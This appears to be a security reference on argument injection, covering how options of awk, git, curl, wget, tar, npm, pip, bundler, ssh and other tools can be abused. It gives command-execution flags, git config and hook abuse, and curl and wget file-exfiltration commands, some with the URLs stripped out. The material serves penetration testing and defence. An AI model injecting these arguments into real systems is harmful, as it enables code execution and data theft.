Argument Injection



awk supports the system command that executes commands:

$ awk 'BEGIN {system("cmdname arg1 arg2")}' /dev/null
# executes the command as many rows in the file
$ awk 'system("cmdname arg1 arg2")' /path/to/file

If spaces can not be inserted, sprintf can be used to bypass it:

$ awk 'BEGIN{system(sprintf("cmdname%carg1",32))}'



bundler install

bundler install uses gem under the hood, therefore, it is possible to reuse gem's features for giving a profit.


Gemfile describes the gem dependencies required to execute associated Ruby code. Since it is a ruby file you can write arbitrary code that will be executed when running bundle install.

# Gemfile

# arbitrary code here
system('echo "hola!"')

When bundle install is run the arbitrary ruby code will be executed.

$ bundle install
The Gemfile specifies no dependencies
Resolving dependencies...
Bundle complete! 0 Gemfile dependencies, 1 gem now installed.

gem dependency

Since bundler uses gem install to install the specified dependencies in Gemfile you can use extensions to embed an arbitrary code.

# hola.gemspec file do |s|        = 'hola'
  s.version     = '0.0.0'
  s.summary     = "Hola!"
  s.description = "A simple hello world gem"
  s.authors     = ["Nick Quaranto"]       = ''
  s.files       = []
  s.homepage    = ''
  s.license     = 'MIT'
  s.extensions  = 'extconf.rb'
# extconf.rb

# arbitrary code here
system('echo "hola!"')
# build and push to
$ gem build hola.gemspec
$ gem push ./hola-0.0.0.gem
# Gemfile

source ''

gem 'hola'

When bundle install is run the arbitrary ruby code will be executed.

$ gem install ./hola-0.0.0.gem
Building native extensions. This could take a while...
ERROR:  Error installing hola-0.0.0.gem:
        ERROR: Failed to build gem native extension.


git dependency

One of the sources of gems for bundler is git repositories with a gem's source code. Since a git repository contains a source code bundler builds it before installing. Therefore, you can write an arbitrary code that will be executed when running bundle install.

Create a repository on with the following hola.gemspec file:

# arbitrary code here
system('echo "hola!"') do |s|        = 'hola'
  s.version     = '0.0.0'
  s.summary     = "Hola!"
  s.description = "A simple hello world gem"
  s.authors     = ["Nick Quaranto"]       = ''
  s.files       = []
  s.homepage    = ''
  s.license     = 'MIT'

Add the repository to Gemfile as a git dependency.

# Gemfile
gem 'hola', :git => ''

When bundle install is run the arbitrary ruby code will be executed.

$ bundle install
Resolving dependencies...
Using bundler 2.2.21
Using hola 0.0.0 from (at main@4a4a4ee)
Bundle complete! 1 Gemfile dependency, 2 gems now installed.


path dependency

You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile. Since a git repository contains a source code bundler builds it before installing. Therefore, you can write an arbitrary code that will be executed when running bundle install.

You can specify that a gem is located in a particular location on the file system. Relative paths are resolved relative to the directory containing the Gemfile.

Similar to the semantics of the :git option, the :path option requires that the directory in question either contains a .gemspec for the gem, or that you specify an explicit version that bundler should use.

Therefore, you can gain code execution using the .gemspec file with an arbitrary code or built gem with native extension.

# Gemfile
# .gemspec file is located in vendor/hola 
gem 'hola', :path => "vendor/hola"
# Gemfile
# vendor/hola contains hola-0.0.0.gem file
gem 'hola', '0.0.0', :path => "vendor/hola"

When bundle install is run the arbitrary ruby code will be executed.

$ bundle install
Resolving dependencies...
Using hola 0.0.0 from source at `vendor/hola`
Using bundler 2.2.21
Bundle complete! 1 Gemfile dependency, 2 gems now installed.



curl can be used to exfiltrate local files or write arbitrary content to them.

# sending local files using a POST request
$ curl --data @/path/to/local/file
$ curl -F 'var=@/path/to/local/file'
$ curl --upload-file /path/to/local/file
# writing a response to a local file
$ curl -o /path/to/local/file

Additionally, the file: scheme can be used to read or copy local files:

# read a local file
$ curl file:///path/to/local/file
# copy a local file to a new place
$ curl file:///path/to/local/file -o /path/to/another/local/file




The -exec key can be used to execute arbitrary commands:

$ find . -name not_existing -or -exec cmdname arg1 arg2 \; -quit
$ find . -exec cmdname arg1 arg2 \; -quit
# read a file
$ find /path/to/file -exec cat {} \; -quit



-execdir is similar to -exec, but the specified command is run from the subdirectory containing the matched items. -execdir can be used to execute arbitrary commands:

$ find . -name not_existing -or -execdir cmdname arg1 arg2 \; -quit
$ find . -execdir cmdname arg1 arg2 \; -quit
# read a file
$ find /path/to/file -execdir cat {} \; -quit


-fprintf can be used to write to local files:

$ find . -fprintf /path/to/file 'arbitrary content here' -quit



gem build

gemspec file is a ruby file that defines what is in the gem, who made it, and the version of the gem. Since it is a ruby file you can write arbitrary code that will be executed when running gem build.

# hola.gemspec file

# arbitrary code here
system('echo "hola!"') do |s|        = 'hola'
  s.version     = '0.0.0'
  s.summary     = "Hola!"
  s.description = "A simple hello world gem"
  s.authors     = ["Nick Quaranto"]       = ''
  s.files       = []
  s.homepage    = ''
  s.license     = 'MIT'

When gem build is run the arbitrary ruby code will be executed.

$ gem build hola.gemspec
  Successfully built RubyGem
  Name: hola
  Version: 0.0.0
  File: hola-0.0.0.gem


gem install


gemspec allows you to define extensions to build when installing a gem. Many gems use extensions to wrap libraries that are written in C with a ruby wrapper. gem uses the extconf.rb to build an extension during installation. Since it is a ruby file you can write arbitrary code that will be executed when running gem install.

# hola.gemspec file do |s|        = 'hola'
  s.version     = '0.0.0'
  s.summary     = "Hola!"
  s.description = "A simple hello world gem"
  s.authors     = ["Nick Quaranto"]       = ''
  s.files       = []
  s.homepage    = ''
  s.license     = 'MIT'
  s.extensions  = 'extconf.rb'
# extconf.rb

# arbitrary code here
system('echo "hola!"')
$ gem build hola.gemspec
  Successfully built RubyGem
  Name: hola
  Version: 0.0.0
  File: hola-0.0.0.gem

When gem install is run the arbitrary ruby code will be executed.

$ gem install ./hola-0.0.0.gem
Building native extensions. This could take a while...
ERROR:  Error installing hola-0.0.0.gem:
        ERROR: Failed to build gem native extension.




-c/--config-env passes a configuration parameter to the command. The value given will override values from configuration files. Check out the Abuse via .git/config section to find parameters that can be abused.

Abusing git directory

A git directory maintains an internal state, or metadata, relating to a git repository. It is created on a user's machine when:

  • The user does git init to initialise an empty local repository

  • The user does git clone <repository> to clone an existing repository from a remote location

The structure of a git directory is documented at

Note that a git directory is often, but not always, a directory named .git at the root of a repo. There are several variables that can redefine a path:

  • GIT_DIR environment variable or --git-dir command-line option specifies a path to use instead of the default .git for the base of the repository.

  • GIT_COMMON_DIR environment variable or commondir file specifies a path from which non-worktree files will be taken, which are normally in $GIT_DIR.

Notice that the bare repositories do not have a .git directory at all.


Abuse via .git/config

.git/config allows for the configuration of options on a per-repo basis. Many of the options allow for the specification of commands that will be executed in various situations, but some of these situations only arise when a user interacts with a git repository in a particular way.

There are at least the following ways to set the options:

  1. On a system-wide basis using /etc/gitconfig file

  2. On a global basis using ~/git/config or ~/.gitconfig files

  3. On a local per-repo basis using .git/config file

  4. On a local per-repo basis using .git/config.worktree file. This is optional and is only searched when extensions.worktreeConfig is present in .git/config

  5. On a local per-repo basis using git -c/--config-env option

  6. On a local per-repo basis using git-clone -c/--config option


core.gitProxy gives a command that will be executed when establishing a connection to a remote using the git:// protocol

$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' >
$ chmod +x
$ git clone -c core.gitProxy="./" git://
Cloning into 'project'...
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
fatal: Could not read from remote repository.

Please make sure you have the correct access rights and the repository exists.


The core.fsmonitor option is used as a command which will identify all files that may have changed since the requested date/time.

In other words, many operations provided by the git will invoke the command given by core.fsmonitor to quickly limit the operation's scope to known-changed files in the interest of performance.

At least the following git operations invoke the command given by core.fsmonitor:

  • git status used to show information about the state of the working tree, including whether any files have uncommitted changes

  • git add <pathspec> used to stage changes for committing to the repo

  • git rm --cached <file> used to unstage changes

  • git commit used to commit staged changes

  • git checkout <pathspec> used to check out a file, commit, tag, branch, etc.

For operations that take a filename, core.fsmonitor will fire even if the filename provided does not exist.

$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# change core.fsmonitor so that it echoes a message to STDERR whenever it is invoked
$ echo $'\tfsmonitor = "echo \\"Pwned as $(id)\\">&2; false"' >> .git/config
$ cat .git/config
	repositoryformatversion = 0
	filemode = true
	bare = false
	logallrefupdates = true
	fsmonitor = "echo \"Pwned as $(id)\">&2; false"
# git-status
$ git status
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
On branch main

No commits yet

nothing to commit (create/copy files and use "git add" to track)

# git-add
$ touch aaaa
$ git add aaaa
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)

$ git add zzzz
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
fatal: pathspec 'zzzz' did not match any files

# git-commit
$ git commit -m 'add aaaa'
Pwned as uid=0(root) gid=0(root) groups=0(root)
Pwned as uid=0(root) gid=0(root) groups=0(root)
[main (root-commit) 7c2f2c6] add aaaa
 1 file changed, 0 insertions(+), 0 deletions(-)
 create mode 100644 aaaa



core.hooksPath sets different path to hooks. You can create the post checkout hook within a repository, set the path to hooks with the hooksPath, and execute arbitrary code.

$ git clone "<REPO>" target_directory
$ cd target_directory
$ mkdir hooks
$ echo "#!/bin/sh" > hooks/post-checkout
$ echo "echo 'arbitrary code here'" >> hooks/post-checkout
$ # commit and push

To execute the payload, run the git-clone:

$ git clone -c core.hooksPath=hooks "<REPO>"



core.pager specifies a text viewer for use by Git commands (e.g., less). The value is meant to be interpreted by the shell and can be used to execute arbitrary commands.

For example, in the following snippet git-grep has the --open-files-in-pager key that uses the default pager from core.pager if the value is unspecified in the arguments:

$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ git -c core.pager='cmdname arg1 arg2 #' grep --open-files-in-pager .

If the pager value is not directly set by a user there is the order of preference:

  1. GIT_PAGER environment variable.

  2. core.pager configuration.

  3. PAGER environment variable.

  4. The default chosen at compile time (usually less).

So, the following snippet can also be used to execute commands:

$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ GIT_PAGER='id #' git grep --open-files-in-pager .


core.sshCommand gives a command that will be executed when establishing a connection to a remote using the SSH protocol. If this variable is set, git fetch and git push will use the specified command instead of ssh when they need to connect to a remote system.

$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' >
$ chmod +x
$ git clone -c core.sshCommand="./"
# or
$ git clone -c core.sshCommand="./" ssh://
Cloning into 'project'...
"Pwned as uid=0(root) gid=0(root) groups=0(root)"
fatal: Could not read from remote repository.

Please make sure you have the correct access rights and the repository exists.


diff.external gives a command that will be used instead of git's internal diff function.

$ echo $'#!/bin/bash\necho \\"Pwned as $(id)\\">&2' >
$ chmod +x
$ git clone
$ cd project
$ git -c diff.external="../" HEAD 480e4c9
"Pwned as uid=0(root) gid=0(root) groups=0(root)"

filter.<driver>.clean and filter.<driver>.smudge

filter..clean is used to convert the content of a worktree file to a blob upon checkin.

filter..smudge is used to convert the content of a blob object to a worktree file upon checkout.

$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# filter.&lt;driver&gt;.clean and filter.&lt;driver&gt;.smudge
# so that they echo a message to STDERR whenever they are invoked
$ echo $'[filter "any"]\n\tsmudge = echo \\"Pwned smudge as $(id)\\">&2\n\tclean = echo \\"Pwned clean as $(id)\\">&2' >> ./.git/config
# add filter to .gitattributes
$ touch example
$ git add ./example
$ git commit -m 'commit'
$ echo "*  text  filter=any" > .gitattributes
$ git status
Pwned clean as uid=0(root) gid=0(root) groups=0(root)
On branch master
Untracked files:
  (use "git add <file>..." to include in what will be committed)

nothing added to commit but untracked files present (use "git add" to track)

$ git add .gitattributes
Pwned clean as uid=0(root) gid=0(root) groups=0(root)
$ cd $(mktemp -d)
# initialized empty Git repository in /tmp/tmp.hLncfRcxgC/.git/
$ git init
# filter.&lt;driver&gt;.clean and filter.&lt;driver&gt;.smudge
# so that they echo a message to STDERR whenever they are invoked
$ echo $'[filter "any"]\n\tsmudge = echo \\"Pwned smudge as $(id)\\">&2\n\tclean = echo \\"Pwned clean as $(id)\\">&2' >> ./.git/config
# add filter to .gitattributes
$ echo "*  text  filter=any" > .gitattributes
$ git fetch
$ git checkout main
Pwned smudge as uid=0(root) gid=0(root) groups=0(root)
Pwned smudge as uid=0(root) gid=0(root) groups=0(root)
Branch 'main' set up to track remote branch 'main' from 'origin'.
Switched to a new branch 'main'


http.proxy and http.<URL>.proxy

http.proxy or http.<URL>.proxy override the HTTP proxy. You can use this to get SSRF:

$ git clone -c http.proxy= -- "<REPO>" target_directory
$ git clone -c http. -- "<REPO>" target_directory

Pay attention to other http.* configs and remote.<name>.proxy, they can help to increase the impact.


Abuse via .git/hooks/

Various files within .git/hooks/ are executed upon certain git operations. For example:

  • pre-commit and post-commit are executed before and after a commit operation respectively

  • post-checkout is executed after checkout operation

  • pre-push is executed before a push operation

On filesystems that differentiate between executable and non-executable files, Hooks are only executed if the respective file is executable. Furthermore, hooks only execute given certain user interaction, such as upon performing a commit.

For instance, you can use bare repositories to deliver custom git hooks and execute arbitrary code:

# clone or create a repo
$ git clone "<REPO>" target_directory
$ cd target_directory
# add subproject as a bare repo
$ mkdir subproject
$ cd subproject
$ git init --bare
# add malicious hook
$ echo "#!/bin/sh" > hooks/post-checkout
$ echo "echo 'arbitrary code here'" >> hooks/post-checkout
# commit and push

If the vulnerable code executes the following bash commands against the prepared repository, it will trigger the custom hook execution and result in the arbitrary code being executed:

$ git clone -- "<REPO>" "target_directory"
$ cd "target_directory"
$ git checkout "subproject"


Abuse via .git/index

You can achieve an arbitrary write primitive using a crafted .git/index file, check an advisory.

Abuse via .git/HEAD

It is possible to trick Git into loading a configuration from an unintended location by corrupting .git/HEAD. In such cases, Git starts looking for repositories in the current folder, which an attacker can fully control, for example, if the current folder is a working tree with all the files of the cloned remote repository. The exploitation flow may look like this:

$ git clone
$ cd repo
# Create empty folders to comply with the expected structure of a Git repository
$ mkdir objects refs worktree
# Create non-empty HEAD to fake a valid reference
$ echo "ref: refs/heads/main" > HEAD
# Prepare a malicious the config file using core.fsmonitor to execute the payload
$ echo "[core]" > config
$ echo "\trepositoryformatversion = 0" >> config
$ echo "\tbare = false" >> config
$ echo "\tworktree = worktree" >> config
$ echo $'\tfsmonitor = "echo \\"Pwned as $(id)\\">&2; false"' >> config
# Corrupt the HEAD file
$ echo "" > .git/HEAD
# Exploit
$ git status
Pwned as uid=501(0xn3va)
Pwned as uid=501(0xn3va)
On branch main

No commits yet

nothing to commit (create/copy files and use "git add" to track)




git-blame has the --output option, which is not documented in the manual and is usually present on other git sub-commands. Executing git blame --output=foo results in interesting behaviour:

$ git init
$ git blame --output=foo
usage: git blame [<options>] [<rev-opts>] [<rev>] [--] <file>

    <rev-opts> are documented in git-rev-list(1)

    --incremental         show blame entries as we find them, incrementally
    -b                    do not show object names of boundary commits (Default: off)
# ...

# Notice the presence of a new file named foo
$ ls -la foo
-rw-r--r--    1 0xn3va  staff     0 Mar 18 20:18 foo

Although the command failed, an empty file named foo was created. If a file with the same name already exists, the destination file is truncated. This option provides an arbitrary file truncation primitive. For example, an attacker can use it to corrupt a critical file in the .git folder like .git/HEAD and trick Git into loading a configuration from an unintended location, check out the Abuse via .git/HEAD section.




-c/--config sets a configuration variable in the newly-created repository; this takes effect immediately after the repository is initialized, but before the remote history is fetched or any files checked out. Check the Abuse via .git/config section to find variables that can be abused.

ext URLs

git-clone allows shell commands to be specified in ext URLs for remote repositories. For instance, the next example will execute the whoami command to try to connect to a remote repository:

$ git clone 'ext::sh -c whoami% >&2'



git-clone allows specifying a new directory to clone into. Cloning into an existing directory is only allowed if the directory is empty. You can use this to write a repo outside a default folder.

$ git clone -- "<REPO>" target_directory


upload-pack specifies a non-default path for the command run on the other end when the repository to clone from is accessed via ssh. You can execute arbitrary code like this:

$ mkdir repo
$ cd repo
$ git init
$ cd -
$ echo "#!/bin/bash" >
$ echo "echo 'arbitrary payload here'" >>
$ chmod +x
$ git clone repo



git-diff against /dev/null

git-diff against /dev/null can be used to read the entire content of a file even outside the git directory.

$ git diff /dev/null /path/fo/file/outside/git/repo
$ git diff /dev/null path/to/file/in/git/repo



The --no-index key can be used to turn git-diff into a normal diff against another file in the git repository, which does not have to be tracked.

$ git diff --no-index local-secret-file.conf




The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.

$ mkdir repo
$ cd repo
$ git init
$ git fetch main --upload-pack='cmdname arg1 arg2 >&2 #'




Same as --upload-pack. Check out the section below.


The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.

$ mkdir repo
$ cd repo
$ git init
$ git fetch-pack --upload-pack='cmdname arg1 arg2 >&2 #' .



no-index tells the git-grep to search files in the current directory that is not managed by Git. In other words, if a working directory is different from a repository one no-index allows you to get access to files in the working directory.



-O/--open-files-in-pager opens the matching files in the pager. It can be used to run arbitrary commands:

$ mkdir repo
$ cd repo
$ git init
$ echo "random" > hop
$ git add .
$ git grep --open-files-in-pager='cmdname arg1 arg2 #' .




output defines a specific file to output instead of stdout. You can use this to rewrite arbitrary files.

$ git log --output=/tmp/arbitrary_file
$ cat /tmp/arbitrary_file
commit c79538fb19b1d9d21bf26e9ad30fdeb90be1eaf0
Author: User <user@local>
Date:   Fri Aug 29 00:00:00 2021 +0000

    Controlled content




The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.

$ mkdir repo
$ cd repo
$ git init
$ git ls-remote --upload-pack='cmdname arg1 arg2 >&2 #' main




The --upload-pack flag can be used to execute arbitrary commands. The output is not shown, but it is possible to route the output to stderr using >&2.

$ mkdir repo
$ cd repo
$ git init
$ git pull main --upload-pack='cmdname arg1 arg2 >&2 #'




receive-pack or exec specifies a path to the git-receive-pack program on the remote end. You can execute arbitrary code like this:

$ echo "#!/bin/bash" >
$ echo "echo 'arbitrary payload here'" >>
$ chmod +x
$ git push username/repo main
# or
$ git push username/repo main
# or
$ git push main


Execution of arbitrary commands or code during mvn <PHASE> execution is possible through the use of various plugins such as exec-maven-plugin or groovy-maven-plugin. In order to execute a malicious payload using the groovy-maven-plugin plugin during the phase <PHASE> you can use the following configuration:

      <phase><!-- PHASE_HERE --></phase>
          print "cmdname arg1 arg2".execute().text

For example, you can execute the plugin during mvn initialize or mvn compile using the following pom.xml file:

<?xml version="1.0" encoding="UTF-8"?>
                    print "cmdname arg1 arg2".execute().text


npm scripts

The scripts property of the package.json file supports a number of built-in scripts and their preset life cycle events as well as arbitrary scripts. These all can be executed using npm run-script or npm run for short.

Pre and post commands with matching names will be run for those as well (e.g. premyscript, myscript, postmyscript). To create pre or post scripts for any scripts defined in the scripts section of the package.json, simply create another script with a matching name and add pre or post to the beginning of them.

In the following example npm run compress would execute these scripts as described.

  "scripts": {
    "precompress": "{{ executes BEFORE the `compress` script }}",
    "compress": "{{ run command to compress files }}",
    "postcompress": "{{ executes AFTER `compress` script }}"

There are some special life cycle scripts that happen only in certain situations. These scripts happen in addition to the pre<event>, post<event>, and <event> scripts.

  • prepare (since npm@4.0.0)

    • Runs any time before the package is packed, i.e. during npm publish and npm pack

    • Runs BEFORE the package is packed

    • Runs BEFORE the package is published

    • Runs on local npm install without any arguments

    • Run AFTER prepublish, but BEFORE prepublishOnly

    • NOTE: If a package being installed through git contains a prepare script, its dependencies and devDependencies will be installed, and the prepare script will be run before the package is packaged and installed

    • As of npm@7 these scripts run in the background. To see the output, run with: --foreground-scripts

  • prepublish (DEPRECATED)

    • Does not run during npm publish, but does run during npm ci and npm install

  • prepublishOnly

    • Runs BEFORE the package is prepared and packed, ONLY on npm publish

  • prepack

    • Runs BEFORE a tarball is packed (on npm pack, npm publish, and when installing git dependencies)

    • NOTE: npm run pack is NOT the same as npm pack. npm run pack is an arbitrary user-defined script name, whereas, npm pack is a CLI-defined command

  • postpack

    • Runs AFTER the tarball has been generated but before it is moved to its final destination (if at all, publish does not save the tarball locally)

npm cache add

npm cache add runs the following life cycle scripts:

  • prepare

npm ci

npm ci runs the following life cycle scripts:

  • preinstall

  • install

  • postinstall

  • prepublish

  • preprepare

  • prepare

  • postprepare

These all run after the actual installation of modules into node_modules, in order, with no internal actions happening in between.

npm diff

npm diff runs the following life cycle scripts:

  • prepare

npm install

npm install runs the following life cycle scripts (also run when you run npm install -g <pkg-name>):

  • preinstall

  • install

  • postinstall

  • prepublish

  • preprepare

  • prepare

  • postprepare

If there is a binding.gyp file in the root of a package and install or preinstall scripts were not defined, npm will default the install command to compile using node-gyp via node-gyp rebuild.

npm pack

npm pack runs the following life cycle scripts:

  • prepack

  • prepare

  • postpack

npm publish

npm publish runs the following life cycle scripts:

  • prepublishOnly

  • prepack

  • prepare

  • postpack

  • publish

  • postpublish

prepare will not run during --dry-run

npm rebuild

npm rebuild runs the following life cycle scripts:

  • preinstall

  • install

  • postinstall

  • prepare

prepare is only run if the current directory is a symlink (e.g. with linked packages)

npm restart

npm restart runs a restart script if it was defined, otherwise stop and start are both run if present, including their pre and post iterations):

  • prerestart

  • restart

  • postrestart

npm start

npm start runs the following life cycle scripts:

  • prestart

  • start

  • poststart

If there is a server.js file in the root of your package, then npm will default the start command to node server.js. prestart and poststart will still run in this case.

npm stop

npm stop runs the following life cycle scripts:

  • prestop

  • stop

  • poststop

npm test

npm test runs the following life cycle scripts:

  • pretest

  • test

  • posttest


pip install

Extending the setuptools modules allows you to hook almost any pip command. For instance, you can use the install class within file to execute an arbitrary code during pip install running.

from setuptools import setup
from setuptools.command.install import install

class PostInstallCommand(install):
    def run(self):
        # Insert code here

        'install': PostInstallCommand,

When pip install is run the method will be invoked.



authorized_keys and id_*.pub

OpenSSH supports the command option, which specifies the command to be executed whenever a key is used for authentication.

command="cmdname arg1 arg2" ssh-ed25519 AAAAC3Nzblah....



ssh obtains configuration data from the following sources in the following order:

  1. Command line

  2. User's configuration file ~/.ssh/config

  3. System-wide configuration file /etc/ssh/ssh_config


LocalCommand specifies a command to execute on the local machine after successfully connecting to the server. The following ssh_config can be used to execute arbitrary commands:

Host *
  PermitLocalCommand yes
  LocalCommand cmdname arg1 arg2




ssh-keygen can load a shared library using the -D key that leads to arbitrary command execution:

$ ssh-keygen -D




A checkpoint is a moment of time before writing nth record to the archive (a write checkpoint), or before reading nth record from the archive (a read checkpoint). Checkpoints allow periodically executing arbitrary actions.

$ tar cf archieve.tar --checkpoint=1 --checkpoint-action="exec=echo 'arbitrary payload here'" foo 


When --to-command key is used, instead of creating the files specified, tar invokes command and pipes the contents of the files to its standard output. So it can be used to execute arbitrary commands.

# Requires valid archive file
$ tar xf file.tar --to-command='cmdname arg1 arg2'



-I/--use-compress-program is used to specify an external compression program command that can be abused to execute arbitrary commands:

# Does not requrie valid archive
$ tar xf /dev/null --use-compress-program='cmdname arg1 arg2'




Terraform relies on plugins called "providers" to interact with remote systems. Terraform configurations must declare which providers they require, so that Terraform can install and use them.

You can write a custom provider, publish it to the Terraform Registry and add the provider to the Terraform code.

terraform {
  required_providers {
    evil = {
      source  = "evil/evil"
      version = "1.0"

provider "evil" {}
$ terraform init
$ terraform plan

The provider will be pulled in during terraform init and when terraform plan is run the arbitrary ruby code will be executed.

Additionally, Terraform offers the external provider which provides a way to interface between Terraform and external programs. Therefore, you to use the external data source to run arbitrary code. The following example from docs executes a python script during terraform plan.

data "external" "example" {
  program = ["python", "${path.module}/"]

  query = {
    # arbitrary map from strings to strings, passed
    # to the external program as the data query.
    id = "abc123"




--use-askpass specifies the command to prompt for a user and password. This key can be used to execute arbitrary commands without any arguments and stdout/stderr.

If no command is specified then the command in the environment variable WGET_ASKPASS is used. If WGET_ASKPASS is not set then the command in the environment variable SSH_ASKPASS is used. Additionally, the default command for use-askpass can be set up in the .wgetrc.

$ wget --use-askpass=cmdname http://0/



--post-file can be used to exfiltrate files in a POST request.

# sends a local file to a remote server 
# file is sent as-is
$ wget --post-file=/path/to/file



-o/--output-document can be used to download a remote file via a GET request and save it to a specific location.

$ wget --output-document=/path/to/file
# prints a file to standard output
$ wget --output-document="-"



-o/--output-file specifies a logfile that will be used to log all messages normally reported to standard error. It can be used to write output to a file.

# reads a local file and writes the output to another local file
# displaying only non-binary files, output is an error log
$ wget --input-file=/path/to/file --output-file=/path/to/another/file



-i/--input-file reads URLs from a local or external file. This key can be used to expose a file content in an error message:

# file content will be displayed as error messages
$ wget --input-file=/path/to/file http://0/




-TT/--unzip-command is used to specify a command to test an archive when the -T option is used.

$ zip /path/to/file -T --unzip-command="cmdname arg1 arg2 #"


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